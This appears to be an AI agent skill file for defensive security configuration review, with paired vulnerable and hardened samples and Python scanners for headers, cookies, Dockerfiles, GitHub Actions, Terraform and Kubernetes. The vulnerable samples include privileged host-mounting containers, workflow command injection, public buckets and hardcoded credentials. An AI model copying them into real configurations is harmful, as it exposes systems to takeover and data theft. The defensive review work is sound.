---
name: perseus-config
description: Security configuration analysis (Headers, CORS, Docker, CI/CD, Cloud, K8s)
---
# Perseus Configuration Specialist

## Context & Authorization

**IMPORTANT:** This skill performs security configuration analysis on the user's own codebase. This is defensive security testing to ensure proper security hardening.

**Authorization:** The user owns this codebase and has explicitly requested this specialized analysis.
## Multi-Language & Platform Support

| Category | Technologies |
|---|---|
| Web Frameworks | Express, Fastify, Next.js, Go/Gin, PHP/Laravel, Python/FastAPI, Rust/Actix |
| Containers | Docker, Podman, containerd |
| Orchestration | Kubernetes, Docker Compose, Docker Swarm |
| CI/CD | GitHub Actions, GitLab CI, Jenkins, CircleCI, Azure DevOps |
| Cloud | AWS, GCP, Azure, DigitalOcean, Vercel, Netlify |
| IaC | Terraform, Pulumi, CloudFormation, Ansible |
## Overview

This specialist skill analyzes security configuration including HTTP headers, TLS settings, CORS policies, container security, CI/CD pipelines, and cloud configurations.

**When to Use:** As part of any security assessment, or specifically when reviewing deployment configuration.

**Goal:** Ensure all security configurations follow best practices and don't introduce vulnerabilities.
## Engagement Mode Compatibility

| Mode | Specialist Behavior |
|---|---|
| PRODUCTION_SAFE | Configuration and manifest analysis with passive verification |
| STAGING_ACTIVE | Controlled config validation with limited active checks |
| LAB_FULL | Broad environment hardening validation in lab |
| LAB_RED_TEAM | Defensive stress simulation for infra misconfig chains in isolated lab |
## Safety Gates (Required)

- Read `deliverables/engagement_profile.md` before active infra validation.
- Default to `PRODUCTION_SAFE` if engagement mode is missing.
- Enforce kill-switch thresholds and stop on environment instability.
- Never modify live infrastructure state without explicit approval.
## Configuration Risks Covered

| Risk | Description | Impact |
|---|---|---|
| Missing Security Headers | No CSP, HSTS, X-Frame-Options | XSS, clickjacking |
| CORS Misconfiguration | Overly permissive origins | Data theft |
| Insecure Cookies | Missing Secure, HttpOnly, SameSite | Session hijacking |
| Debug Mode | Production debug enabled | Info disclosure |
| Docker Misconfig | Root user, privileged mode | Container escape |
| CI/CD Secrets | Exposed secrets, injection | Supply chain attack |
| Cloud Misconfig | Public buckets, open security groups | Data breach |
| K8s Insecurity | No RBAC, privileged pods | Cluster compromise |
## Execution Instructions

### Step 0: Mode & Scope Alignment

- Load mode/scope/limits from `deliverables/engagement_profile.md`.
- Respect `deliverables/verification_scope.md` when present.
- Keep production checks read-only and non-disruptive.
### Phase 1: HTTP Security Headers (3 Parallel Agents)

- **CSP Analyst:**
  - "Find Content Security Policy configuration across frameworks."

  Framework-specific patterns:

  ```javascript
  // Express (helmet)
  app.use(helmet.contentSecurityPolicy({ directives: {...} }));
  // Next.js (headers() in next.config.js)
  headers: [{ key: 'Content-Security-Policy', value: '...' }]
  ```

  ```go
  // Go/Gin
  c.Header("Content-Security-Policy", "default-src 'self'")
  ```

  ```python
  # Django (django-csp settings)
  CSP_DEFAULT_SRC = ("'self'",)
  # FastAPI / Starlette response
  response.headers["Content-Security-Policy"] = "..."
  ```

  ```php
  // PHP
  header('Content-Security-Policy: default-src \'self\'');
  ```

- **Security Headers Analyst:**
  - "Check for all security headers across languages."

  Headers to check:

  | Header | Purpose | Recommended Value |
  |---|---|---|
  | Strict-Transport-Security | Force HTTPS | `max-age=31536000; includeSubDomains` |
  | X-Frame-Options | Prevent clickjacking | `DENY` or `SAMEORIGIN` |
  | X-Content-Type-Options | Prevent MIME sniffing | `nosniff` |
  | Referrer-Policy | Control referrer | `strict-origin-when-cross-origin` |
  | Permissions-Policy | Limit browser features | Disable unused features |

- **Cookie Security Analyst:**
  - "Find all cookie setting operations across languages."

  Patterns:

  ```javascript
  // Express
  res.cookie('session', value, { secure: true, httpOnly: true, sameSite: 'strict' });
  ```

  ```go
  // Go net/http
  http.SetCookie(w, &http.Cookie{Secure: true, HttpOnly: true, SameSite: http.SameSiteStrictMode})
  ```

  ```php
  // PHP
  setcookie('session', $value, ['secure' => true, 'httponly' => true, 'samesite' => 'Strict']);
  ```

  ```python
  # Flask / FastAPI
  response.set_cookie(key, value, secure=True, httponly=True, samesite='strict')
  ```
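
Added example, not part of the Perseus skill or of any project it targets: a stand-alone Python checker that applies the header table and the cookie-attribute rules above to a captured response. The function names (`check_headers`, `check_cookies`) and the sample header and `Set-Cookie` values are constructed for this example; it needs only the standard library. It shows the passive form of the Phase 1 checks: read the response, never change the target.

```python
"""Header and cookie checks for a captured HTTP response (added example).

Not the skill's own code: applies the header table and the cookie rules from
Phase 1 to a constructed response. Names and sample values are this example's own.
"""
from http.cookies import SimpleCookie

MIN_HSTS_AGE = 31536000  # one year, the value recommended in the header table

# Constructed samples (not captured from a real service): a weak response and a hardened one.
WEAK_HEADERS = {
    "Strict-Transport-Security": "max-age=3600",
    "X-Frame-Options": "ALLOW-FROM https://partner.example",
    "X-Content-Type-Options": "nosniff",
    "Content-Security-Policy": "default-src 'self'; script-src 'self' 'unsafe-inline'",
}
HARDENED_HEADERS = {
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Frame-Options": "DENY",
    "X-Content-Type-Options": "nosniff",
    "Referrer-Policy": "strict-origin-when-cross-origin",
    "Permissions-Policy": "camera=(), microphone=(), geolocation=()",
    "Content-Security-Policy": "default-src 'self'; script-src 'self'",
}
WEAK_SET_COOKIE = [
    "session=abc123; Path=/; HttpOnly",                     # no Secure, no SameSite
    "csrf=xyz; Path=/; Secure; HttpOnly; SameSite=Strict",  # all three attributes present
]


def _directives(value: str) -> dict:
    """Split 'a=b; c' style header values into {lower-cased name: value}."""
    out = {}
    for part in value.split(";"):
        part = part.strip()
        if part:
            name, _, val = part.partition("=")
            out[name.strip().lower()] = val.strip()
    return out


def check_headers(headers: dict) -> list:
    """Return one finding per problem; an empty list means every header check passed."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    hsts = h.get("strict-transport-security")
    if hsts is None:
        findings.append("HSTS missing")
    else:
        d = _directives(hsts)
        age = int(d.get("max-age", "0") or 0)
        if age < MIN_HSTS_AGE:
            findings.append(f"HSTS max-age too low ({age} < {MIN_HSTS_AGE})")
        if "includesubdomains" not in d:
            findings.append("HSTS lacks includeSubDomains")
    xfo = h.get("x-frame-options")
    if xfo is None:
        findings.append("X-Frame-Options missing")
    elif xfo.strip().upper() not in ("DENY", "SAMEORIGIN"):
        findings.append(f"X-Frame-Options has non-standard value {xfo!r}")
    if h.get("x-content-type-options", "").strip().lower() != "nosniff":
        findings.append("X-Content-Type-Options is not nosniff")
    if "referrer-policy" not in h:
        findings.append("Referrer-Policy missing")
    if "permissions-policy" not in h:
        findings.append("Permissions-Policy missing")
    csp = h.get("content-security-policy")
    if csp is None:
        findings.append("CSP missing")
    else:
        # script-src falls back to default-src when it is not set explicitly
        srcs = {}
        for part in csp.split(";"):
            tokens = part.split()
            if tokens:
                srcs[tokens[0].lower()] = tokens[1:]
        if "'unsafe-inline'" in srcs.get("script-src", srcs.get("default-src", [])):
            findings.append("CSP allows 'unsafe-inline' scripts")
    return findings


def check_cookies(set_cookie_values: list) -> list:
    """Check each Set-Cookie value for the Secure, HttpOnly and SameSite attributes."""
    findings = []
    for raw in set_cookie_values:
        jar = SimpleCookie()
        jar.load(raw)
        for name, morsel in jar.items():
            if not morsel["secure"]:
                findings.append(f"cookie {name}: missing Secure")
            if not morsel["httponly"]:
                findings.append(f"cookie {name}: missing HttpOnly")
            if morsel["samesite"].lower() not in ("strict", "lax"):
                findings.append(f"cookie {name}: SameSite missing or None")
    return findings


if __name__ == "__main__":
    for f in check_headers(WEAK_HEADERS) + check_cookies(WEAK_SET_COOKIE):
        print("FAIL:", f)
    print("hardened headers:", check_headers(HARDENED_HEADERS) or "all checks pass")
```

Feed it the header map and the list of `Set-Cookie` values from a single captured response; the CSP check deliberately looks at the effective script source list (falling back to `default-src`), which is the case grep-based searches for `unsafe-inline` miss.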
### Phase 2: Docker Security Analysis (4 Parallel Agents)

- **Dockerfile Analyst:**
  - "Analyze all Dockerfiles for security issues."

  Issues to find:

  ```dockerfile
  # VULNERABLE - Running as root (no USER directive)
  FROM node:18
  COPY . .
  CMD ["node", "app.js"]
  ```

  ```dockerfile
  # SAFE - Non-root user
  FROM node:18
  # Debian-based image: shadow-utils syntax (on Alpine use addgroup -S / adduser -S)
  RUN groupadd -r app && useradd -r -g app app
  USER app
  COPY --chown=app:app . .
  CMD ["node", "app.js"]
  ```

  Checks:
  - Running as root (no `USER` directive)
  - Using the `latest` tag
  - Secrets in build args or `ENV`
  - Unnecessary packages installed
  - No health check
  - Exposed unnecessary ports

- **Docker Compose Analyst:**
  - "Analyze docker-compose files for security issues."

  Issues:

  ```yaml
  # VULNERABLE - privileged container on the host network with the host root mounted
  services:
    app:
      privileged: true
      network_mode: host
      volumes:
        - /:/host
      cap_add:
        - ALL
  ```

  ```yaml
  # SAFE - read-only filesystem, no privilege escalation, all capabilities dropped
  services:
    app:
      read_only: true
      security_opt:
        - no-new-privileges:true
      cap_drop:
        - ALL
  ```

- **Container Secrets Analyst:**
  - "Check for secrets in container configurations."

  Patterns:

  ```dockerfile
  # VULNERABLE - secrets baked into image layers and build history
  ENV DATABASE_PASSWORD=secret123
  ARG API_KEY=sk-xxx
  COPY .env /app/.env
  ```

- **Image Security Analyst:**
  - "Check base image security and update status."

  Checks:
  - Using official images
  - Pinned versions (not `latest`)
  - Multi-stage builds for smaller attack surface
  - Distroless/Alpine for minimal images
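
Added example, not part of the skill: a Dockerfile analyzer in Python that implements the Dockerfile and image checks above (root user, `latest` or unpinned base image, secrets in `ENV`/`ARG`, `.env` copied into the image, SSH port exposed, missing `HEALTHCHECK`). It parses the file itself, joining backslash continuations, so it needs no third-party library. The two embedded Dockerfiles and all names in them are constructed for this example.

```python
"""Dockerfile security checks (added example, not the skill's own code).

Implements the Phase 2 Dockerfile/image checks over an in-memory Dockerfile.
Sample Dockerfiles and the secret-name heuristic are this example's own.
"""
import re

SECRET_NAME = re.compile(r"(PASSWORD|SECRET|TOKEN|API_KEY|PRIVATE_KEY)", re.I)

# Constructed Dockerfiles (not from any real project).
WEAK_DOCKERFILE = """\
FROM node:latest
ARG NPM_TOKEN=npm_abc123
ENV DATABASE_PASSWORD=secret123 \\
    PORT=3000
COPY .env /app/.env
COPY . .
EXPOSE 22 3000
CMD ["node", "app.js"]
"""
HARDENED_DOCKERFILE = """\
FROM node:18-alpine
RUN addgroup -S app && adduser -S app -G app
USER app
COPY --chown=app:app . .
EXPOSE 3000
HEALTHCHECK CMD wget -qO- http://localhost:3000/health || exit 1
CMD ["node", "app.js"]
"""


def parse_dockerfile(text: str) -> list:
    """Return (INSTRUCTION, argument) tuples; joins backslash continuations, skips comments."""
    instructions, buf = [], ""
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if stripped.endswith("\\"):          # continuation: accumulate and keep reading
            buf += stripped[:-1] + " "
            continue
        full = " ".join((buf + stripped).split())  # collapse whitespace across joined lines
        buf = ""
        ins, _, rest = full.partition(" ")
        instructions.append((ins.upper(), rest))
    return instructions


def analyze_dockerfile(text: str) -> list:
    """Return one finding string per problem; empty list means all checks passed."""
    instr = parse_dockerfile(text)
    findings = []
    for ins, arg in instr:
        if ins == "FROM":
            name = [p for p in arg.split() if not p.startswith("--")][0]  # drop --platform, AS stage
            if ":" not in name and "@" not in name:
                findings.append(f"unpinned base image {name} (defaults to latest)")
            elif name.endswith(":latest"):
                findings.append(f"base image {name} uses the latest tag")
    users = [arg for ins, arg in instr if ins == "USER"]
    if not users or users[-1].split(":")[0] in ("root", "0"):
        findings.append("runs as root (no non-root USER directive)")
    for ins, arg in instr:
        if ins in ("ENV", "ARG"):
            tokens = arg.split()
            # KEY=value pairs, or the legacy "ENV KEY value" form
            keys = [t.split("=", 1)[0] for t in tokens if "=" in t] or tokens[:1]
            for key in keys:
                if SECRET_NAME.search(key):
                    findings.append(f"{ins} {key} embeds a secret in the image")
        if ins in ("COPY", "ADD") and re.search(r"(^|\s|/)\.env(\s|$)", arg):
            findings.append(f"{ins} copies a .env file into the image")
        if ins == "EXPOSE" and "22" in arg.split():
            findings.append("EXPOSE 22: SSH port exposed from the container")
    if not any(ins == "HEALTHCHECK" for ins, _ in instr):
        findings.append("no HEALTHCHECK defined")
    return findings


if __name__ == "__main__":
    for f in analyze_dockerfile(WEAK_DOCKERFILE):
        print("FAIL:", f)
    print("hardened:", analyze_dockerfile(HARDENED_DOCKERFILE) or "all checks pass")
```

The secret-name regex is a heuristic on variable names only; a value-based scanner (entropy or known key prefixes) is a separate check and not attempted here.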
### Phase 3: CI/CD Security Analysis (4 Parallel Agents)

- **GitHub Actions Analyst:**
  - "Analyze GitHub Actions workflows for security issues."

  Critical issues:

  ```yaml
  # VULNERABLE - event data interpolated into the shell (command injection)
  - run: echo "${{ github.event.issue.title }}"
  ```

  ```yaml
  # SAFE - pass event data through an environment variable
  - run: echo "$TITLE"
    env:
      TITLE: ${{ github.event.issue.title }}
  ```

  ```yaml
  # VULNERABLE - pull_request_target checks out untrusted PR code with a write token
  on: pull_request_target
  steps:
    - uses: actions/checkout@v4
      with:
        ref: ${{ github.event.pull_request.head.sha }}
  ```

  ```yaml
  # VULNERABLE - secret interpolated into a command line (may land in logs)
  - run: curl -H "Authorization: ${{ secrets.API_KEY }}" $URL
  ```

  Checks:
  - Command injection via event data
  - Secrets exposure in logs
  - Overly permissive permissions
  - Using unverified actions
  - `pull_request_target` misuse

- **GitLab CI Analyst:**
  - "Analyze .gitlab-ci.yml for security issues."

  Issues:

  ```yaml
  # VULNERABLE - token echoed to the job log, unvalidated input passed to a command
  script:
    - echo $CI_JOB_TOKEN
    - curl "$USER_INPUT"
  ```

- **Secrets Management Analyst:**
  - "Check how secrets are managed in CI/CD."

  Checks:
  - Secrets in workflow files
  - Secrets in repository
  - Secrets passed to forks
  - Secrets in build logs
  - Environment variable exposure

- **Pipeline Permissions Analyst:**
  - "Check CI/CD permissions and access controls."

  GitHub Actions permissions:

  ```yaml
  # VULNERABLE - every scope of the GITHUB_TOKEN is writable
  permissions: write-all
  ```

  ```yaml
  # SAFE - least privilege
  permissions:
    contents: read
    pull-requests: write
  ```
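
Added example, not part of the skill: a line-based scanner for the GitHub Actions checks above (expression injection in `run:` steps, secrets interpolated into commands, `permissions: write-all`, actions not pinned to a commit SHA, and `pull_request_target` checking out the PR head). It works on the raw workflow text so it needs no YAML library; the list of attacker-controllable contexts is a heuristic drawn from GitHub's documented examples (issue and PR titles and bodies, comments, reviews, commit messages, branch names). Both sample workflows, the scanner's function names, and the placeholder SHA are constructed.

```python
"""GitHub Actions workflow checks (added example, not the skill's own code)."""
import re

EXPR = re.compile(r"\$\{\{\s*([^}]*?)\s*\}\}")
# Contexts GitHub documents as user-controllable; heuristic list, extend as needed.
UNTRUSTED = re.compile(
    r"^github\.(head_ref|event\.(issue|pull_request|comment|review|discussion|head_commit|commits)\b)"
)
RUN_LINE = re.compile(r"^(\s*(?:-\s+)?)run:\s*(.*)$")
SHA_PIN = re.compile(r"@[0-9a-f]{40}\s*(#.*)?$")

# Constructed workflow that trips every check (not from a real repository).
WEAK_WORKFLOW = """\
name: pr-greeter
on: pull_request_target
permissions: write-all
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: echo "PR Title: ${{ github.event.pull_request.title }}"
      - run: |
          echo "branch ${{ github.head_ref }}"
          curl -H "Authorization: ${{ secrets.API_KEY }}" "$URL"
      - run: echo "$TITLE"
        env:
          TITLE: ${{ github.event.pull_request.title }}
"""
SAFE_WORKFLOW = """\
on: pull_request
permissions:
  contents: read
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0000000000000000000000000000000000000000  # placeholder SHA, not a real commit
      - run: echo "PR Title: $TITLE"
        env:
          TITLE: ${{ github.event.pull_request.title }}
"""


def run_scripts(lines: list):
    """Yield (line_no, script) for each run: step, joining block scalars (| or >)."""
    i = 0
    while i < len(lines):
        m = RUN_LINE.match(lines[i])
        if not m:
            i += 1
            continue
        start, indent, value = i + 1, len(m.group(1)), m.group(2).strip()
        i += 1
        if value in ("|", ">", "|-", ">-"):
            body = []  # block scalar: every following line indented deeper than the run: key
            while i < len(lines) and (not lines[i].strip() or len(lines[i]) - len(lines[i].lstrip()) > indent):
                body.append(lines[i])
                i += 1
            yield start, "\n".join(body)
        else:
            yield start, value


def scan_workflow(text: str) -> list:
    """Return (line_no, finding) tuples in file order; an empty list means no check fired."""
    lines = text.splitlines()
    findings = []
    for n, line in enumerate(lines, 1):
        if re.match(r"^\s*permissions:\s*write-all\s*$", line):
            findings.append((n, "permissions: write-all grants every token scope; use a minimal permissions map"))
        um = re.match(r"^\s*-?\s*uses:\s*(\S+)", line)
        if um and "@" in um.group(1) and not SHA_PIN.search(line):
            findings.append((n, f"action {um.group(1)} is not pinned to a commit SHA"))
        if "pull_request_target" in text and re.match(r"^\s*ref:\s*\$\{\{\s*github\.event\.pull_request\.head\.", line):
            findings.append((n, "pull_request_target workflow checks out the PR head: untrusted code runs with the write token and secrets"))
    for n, script in run_scripts(lines):
        for expr in EXPR.findall(script):
            if UNTRUSTED.match(expr):
                findings.append((n, f"run: interpolates untrusted ${{{{ {expr} }}}} into the shell; pass it via env instead"))
            elif expr.startswith("secrets."):
                findings.append((n, f"run: interpolates ${{{{ {expr} }}}} into a command; use an env variable so it stays out of logs"))
    return findings


if __name__ == "__main__":
    for n, msg in scan_workflow(WEAK_WORKFLOW):
        print(f"line {n}: {msg}")
    print("safe workflow:", scan_workflow(SAFE_WORKFLOW) or "no findings")
```

The `env:` indirection in the safe workflow is not flagged because the expression never reaches a `run:` script; that is exactly the distinction the remediation in Phase 3 relies on.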
### Phase 4: Cloud Configuration Analysis (4 Parallel Agents)

- **AWS Configuration Analyst:**
  - "Analyze AWS configurations for security issues."

  Check files:
  - `*.tf` (Terraform)
  - `template.yaml` (CloudFormation)
  - `serverless.yml`
  - `.aws/` configs

  Issues:

  ```hcl
  # VULNERABLE - Public S3
  resource "aws_s3_bucket" "data" {
    acl = "public-read"
  }

  # VULNERABLE - Open security group (all ports, all protocols, from anywhere)
  resource "aws_security_group" "web" {
    ingress {
      from_port   = 0
      to_port     = 65535
      protocol    = "-1"
      cidr_blocks = ["0.0.0.0/0"]
    }
  }

  # VULNERABLE - Hardcoded credentials
  provider "aws" {
    access_key = "AKIA..."
    secret_key = "..."
  }
  ```

- **GCP/Azure Configuration Analyst:**
  - "Analyze GCP and Azure configurations."

  GCP issues:

  ```hcl
  # VULNERABLE - Public GCS
  resource "google_storage_bucket_iam_member" "public" {
    member = "allUsers"
    role   = "roles/storage.objectViewer"
  }
  ```

- **Serverless Configuration Analyst:**
  - "Analyze serverless configurations (Vercel, Netlify, AWS Lambda)."

  Check:
  - Environment variables in config
  - Overly permissive IAM roles
  - Public function URLs
  - Missing authentication

- **Infrastructure as Code Analyst:**
  - "Check Terraform, Pulumi, Ansible for security issues."

  Terraform issues:

  ```hcl
  # VULNERABLE - No encryption
  resource "aws_ebs_volume" "data" {
    encrypted = false
  }

  # VULNERABLE - Default VPC
  resource "aws_instance" "web" {
    # No VPC specified, uses default
  }
  ```
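
Added example, not part of the skill: a Python checker for the Terraform issues above (public S3 ACL, world-open security group, hardcoded provider credentials, unencrypted EBS volume, public GCS IAM binding). It uses a small brace-matching block reader instead of an HCL library, which is enough for attribute-level checks but does not handle braces inside strings or interpolations. The sample HCL, the resource names and the placeholder credential values are constructed; it also shows a world-reachable HTTPS rule that is correctly left unflagged.

```python
"""Terraform misconfiguration checks (added example, not the skill's own code)."""
import re

BLOCK_HEAD = re.compile(r'^[ \t]*(resource|provider)[ \t]+"([^"]+)"(?:[ \t]+"([^"]+)")?[ \t]*\{', re.M)

# Constructed HCL; every value is a placeholder, including the fake access key.
SAMPLE_TF = """
provider "aws" {
  access_key = "AKIA_PLACEHOLDER_NOT_REAL"
  secret_key = "placeholder"
}

resource "aws_s3_bucket" "data" {
  acl = "public-read"
}

resource "aws_security_group" "web" {
  ingress {
    from_port   = 0
    to_port     = 65535
    protocol    = "-1"
    cidr_blocks = ["0.0.0.0/0"]
  }
}

resource "aws_security_group" "web_https" {
  ingress {
    from_port   = 443
    to_port     = 443
    protocol    = "tcp"
    cidr_blocks = ["0.0.0.0/0"]
  }
}

resource "aws_ebs_volume" "data" {
  encrypted = false
}

resource "google_storage_bucket_iam_member" "public" {
  role   = "roles/storage.objectViewer"
  member = "allUsers"
}
"""


def blocks(text: str):
    """Yield (kind, type, name, body, line_no) per top-level block by matching braces."""
    for m in BLOCK_HEAD.finditer(text):
        depth, i = 1, m.end()
        while depth and i < len(text):
            depth += {"{": 1, "}": -1}.get(text[i], 0)
            i += 1
        yield m.group(1), m.group(2), m.group(3), text[m.end():i - 1], text.count("\n", 0, m.start()) + 1


def attr(body: str, name: str):
    """First `name = value` assignment in body, surrounding quotes stripped; None when absent."""
    m = re.search(rf"^[ \t]*{re.escape(name)}[ \t]*=[ \t]*(.+?)[ \t]*$", body, re.M)
    return m.group(1).strip('"') if m else None


def check_terraform(text: str) -> list:
    """Return (line_no, finding) tuples for the Phase 4 Terraform checks."""
    findings = []
    for kind, rtype, name, body, line in blocks(text):
        label = f"{rtype}.{name}" if name else f"provider {rtype}"
        if kind == "provider" and rtype == "aws" and (attr(body, "access_key") or attr(body, "secret_key")):
            findings.append((line, f"{label}: hardcoded credentials; use an IAM role, profile or environment"))
        if rtype == "aws_s3_bucket" and attr(body, "acl") in ("public-read", "public-read-write"):
            findings.append((line, f"{label}: acl {attr(body, 'acl')} makes the bucket public"))
        if rtype == "aws_security_group":
            for rule in re.finditer(r"ingress\s*\{([^}]*)\}", body):
                r = rule.group(1)
                if "0.0.0.0/0" not in (attr(r, "cidr_blocks") or ""):
                    continue  # not reachable from the whole internet
                lo, hi = int(attr(r, "from_port") or 0), int(attr(r, "to_port") or 0)
                if attr(r, "protocol") == "-1" or (lo == 0 and hi == 65535):
                    findings.append((line, f"{label}: ingress from 0.0.0.0/0 on all ports"))
                elif lo <= 22 <= hi or lo <= 3389 <= hi:
                    findings.append((line, f"{label}: SSH/RDP reachable from 0.0.0.0/0"))
        if rtype == "aws_ebs_volume" and attr(body, "encrypted") != "true":
            findings.append((line, f"{label}: encrypted is not true; data at rest is unencrypted"))
        if rtype == "google_storage_bucket_iam_member" and attr(body, "member") in ("allUsers", "allAuthenticatedUsers"):
            findings.append((line, f"{label}: {attr(body, 'member')} binding makes the bucket public"))
    return findings


if __name__ == "__main__":
    for n, msg in check_terraform(SAMPLE_TF):
        print(f"line {n}: {msg}")
```

The EBS rule treats a missing `encrypted` attribute as a finding too, since the resource does not encrypt unless told to (or unless account-level default encryption is on, which this static check cannot see).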
### Phase 5: Kubernetes Security Analysis (4 Parallel Agents)

- **Pod Security Analyst:**
  - "Analyze Kubernetes pod/deployment manifests."

  Issues:

  ```yaml
  # VULNERABLE - privileged container running as root with the host filesystem mounted
  spec:
    containers:
      - name: app
        securityContext:
          privileged: true
          runAsUser: 0            # 0 = root
          allowPrivilegeEscalation: true
        volumeMounts:
          - mountPath: /host
            name: host-root
    volumes:
      - name: host-root
        hostPath:
          path: /
  ```

  ```yaml
  # SAFE - non-root, no escalation, read-only root filesystem, all capabilities dropped
  spec:
    securityContext:
      runAsNonRoot: true
      runAsUser: 1000
    containers:
      - name: app
        securityContext:
          allowPrivilegeEscalation: false
          readOnlyRootFilesystem: true
          capabilities:
            drop: ["ALL"]
  ```

- **RBAC Analyst:**
  - "Analyze Kubernetes RBAC configurations."

  Issues:

  ```yaml
  # VULNERABLE - default service account bound to cluster-admin
  apiVersion: rbac.authorization.k8s.io/v1
  kind: ClusterRoleBinding
  subjects:
    - kind: ServiceAccount
      name: default
  roleRef:
    kind: ClusterRole
    name: cluster-admin
  ```

- **Network Policy Analyst:**
  - "Check Kubernetes network policies."

  Issues:
  - No network policies (all pods can communicate)
  - Overly permissive ingress/egress
  - Missing pod selectors

- **Secrets & ConfigMap Analyst:**
  - "Analyze Kubernetes secrets management."

  Issues:

  ```yaml
  # Secret data is only base64-encoded, not encrypted: cGFzc3dvcmQ= decodes to "password"
  apiVersion: v1
  kind: Secret
  data:
    password: cGFzc3dvcmQ=
  ```
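
Added example, not part of the skill: Python checks for the pod-security and RBAC issues above, run over parsed manifests. The manifests are embedded as dicts in the shape `yaml.safe_load()` returns so the example runs without PyYAML; the deployment and binding names, the image names and the function names are constructed. `check_pod_security` walks the pod spec of a Pod, Deployment, StatefulSet, DaemonSet, Job or CronJob, and `check_binding` flags `cluster-admin` grants, the `default` ServiceAccount as a subject, and grants to the `system:authenticated` / `system:unauthenticated` groups.

```python
"""Pod security and RBAC checks on parsed Kubernetes manifests (added example, not the skill's own code)."""

# Constructed manifests as dicts (what yaml.safe_load would return).
WEAK_DEPLOYMENT = {
    "apiVersion": "apps/v1", "kind": "Deployment", "metadata": {"name": "app"},
    "spec": {"template": {"spec": {
        "containers": [{
            "name": "app", "image": "registry.example/app:latest",
            "securityContext": {"privileged": True, "allowPrivilegeEscalation": True},
            "volumeMounts": [{"mountPath": "/host", "name": "host-root"}],
        }],
        "volumes": [{"name": "host-root", "hostPath": {"path": "/"}}],
    }}},
}
HARDENED_DEPLOYMENT = {
    "apiVersion": "apps/v1", "kind": "Deployment", "metadata": {"name": "app"},
    "spec": {"template": {"spec": {
        "securityContext": {"runAsNonRoot": True, "runAsUser": 1000},
        "containers": [{
            "name": "app", "image": "registry.example/app:1.4.2",
            "securityContext": {
                "allowPrivilegeEscalation": False, "readOnlyRootFilesystem": True,
                "capabilities": {"drop": ["ALL"]},
            },
        }],
    }}},
}
WEAK_BINDING = {
    "apiVersion": "rbac.authorization.k8s.io/v1", "kind": "ClusterRoleBinding",
    "metadata": {"name": "default-admin"},
    "subjects": [{"kind": "ServiceAccount", "name": "default", "namespace": "default"}],
    "roleRef": {"kind": "ClusterRole", "name": "cluster-admin", "apiGroup": "rbac.authorization.k8s.io"},
}


def pod_spec(manifest: dict) -> dict:
    """Return the pod spec for a Pod or for any workload kind that wraps a pod template."""
    kind, spec = manifest.get("kind"), manifest.get("spec", {})
    if kind == "Pod":
        return spec
    if kind == "CronJob":
        return spec["jobTemplate"]["spec"]["template"]["spec"]
    return spec["template"]["spec"]


def check_pod_security(manifest: dict) -> list:
    """Return one finding per pod-security problem; empty list means the manifest passes."""
    spec = pod_spec(manifest)
    name = manifest.get("metadata", {}).get("name", "?")
    pod_ctx = spec.get("securityContext", {})
    findings = []
    for flag in ("hostNetwork", "hostPID", "hostIPC"):
        if spec.get(flag):
            findings.append(f"{name}: {flag} shares a host namespace")
    for vol in spec.get("volumes", []):
        if "hostPath" in vol:
            findings.append(f"{name}: volume {vol['name']} mounts hostPath {vol['hostPath'].get('path')}")
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        ctx = c.get("securityContext", {})
        label = f"{name}/{c['name']}"
        # container settings override pod settings; uid 0 or nothing at all means root
        if not (pod_ctx.get("runAsNonRoot") or ctx.get("runAsNonRoot")
                or ctx.get("runAsUser", pod_ctx.get("runAsUser", 0))):
            findings.append(f"{label}: may run as root (no runAsNonRoot or non-zero runAsUser)")
        if ctx.get("privileged"):
            findings.append(f"{label}: privileged container")
        if ctx.get("allowPrivilegeEscalation") is not False:
            findings.append(f"{label}: allowPrivilegeEscalation not set to false")
        if ctx.get("readOnlyRootFilesystem") is not True:
            findings.append(f"{label}: root filesystem is writable")
        if "ALL" not in ctx.get("capabilities", {}).get("drop", []):
            findings.append(f"{label}: capabilities.drop does not include ALL")
        image = c.get("image", "")
        if "@sha256:" not in image and (":" not in image.rsplit("/", 1)[-1] or image.endswith(":latest")):
            findings.append(f"{label}: image {image} is unpinned or latest")
    return findings


def check_binding(binding: dict) -> list:
    """Flag RBAC bindings that hand out cluster-admin or target overly broad subjects."""
    if binding.get("kind") not in ("ClusterRoleBinding", "RoleBinding"):
        return []
    name = binding.get("metadata", {}).get("name", "?")
    role = binding.get("roleRef", {})
    findings = []
    if role.get("kind") == "ClusterRole" and role.get("name") == "cluster-admin":
        findings.append(f"{name}: binds cluster-admin")
    for s in binding.get("subjects", []):
        if s.get("kind") == "ServiceAccount" and s.get("name") == "default":
            findings.append(f"{name}: grants the role to the default ServiceAccount (shared by every pod without its own)")
        if s.get("kind") == "Group" and s.get("name") in ("system:authenticated", "system:unauthenticated"):
            findings.append(f"{name}: grants the role to {s['name']}")
    return findings


if __name__ == "__main__":
    for f in check_pod_security(WEAK_DEPLOYMENT) + check_binding(WEAK_BINDING):
        print("FAIL:", f)
    print("hardened:", check_pod_security(HARDENED_DEPLOYMENT) or "all checks pass")
```

To run it against real manifests, load each document with `yaml.safe_load_all()` and dispatch on `kind`; the checks themselves stay the same.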
### Phase 6: Application Configuration (3 Parallel Agents)

- **Debug Mode Analyst:**
  - "Check for debug/development mode in production configs."

  Patterns:

  ```javascript
  // Node.js
  DEBUG = true
  NODE_ENV = 'development'
  ```

  ```python
  # Django settings / Flask
  DEBUG = True
  app.run(debug=True)
  ```

  ```ini
  # Laravel .env
  APP_DEBUG=true
  ```

  ```go
  // Go/Gin
  gin.SetMode(gin.DebugMode)
  ```

- **Error Handling Analyst:**
  - "Check error responses for information disclosure."

- **Environment Variables Analyst:**
  - "Check .env files and environment variable handling."

  Issues:
  - `.env` files in repository
  - Secrets in `.env.example`
  - Missing `.env` in `.gitignore`
  - Secrets logged
## Output Requirements

Create `deliverables/config_security_analysis.md`:

````markdown
# Security Configuration Analysis

## Summary

| Category | Checks | Pass | Fail | Critical |
|----------|--------|------|------|----------|
| HTTP Headers | X | Y | Z | W |
| Cookies | X | Y | Z | W |
| Docker | X | Y | Z | W |
| CI/CD | X | Y | Z | W |
| Cloud (AWS/GCP/Azure) | X | Y | Z | W |
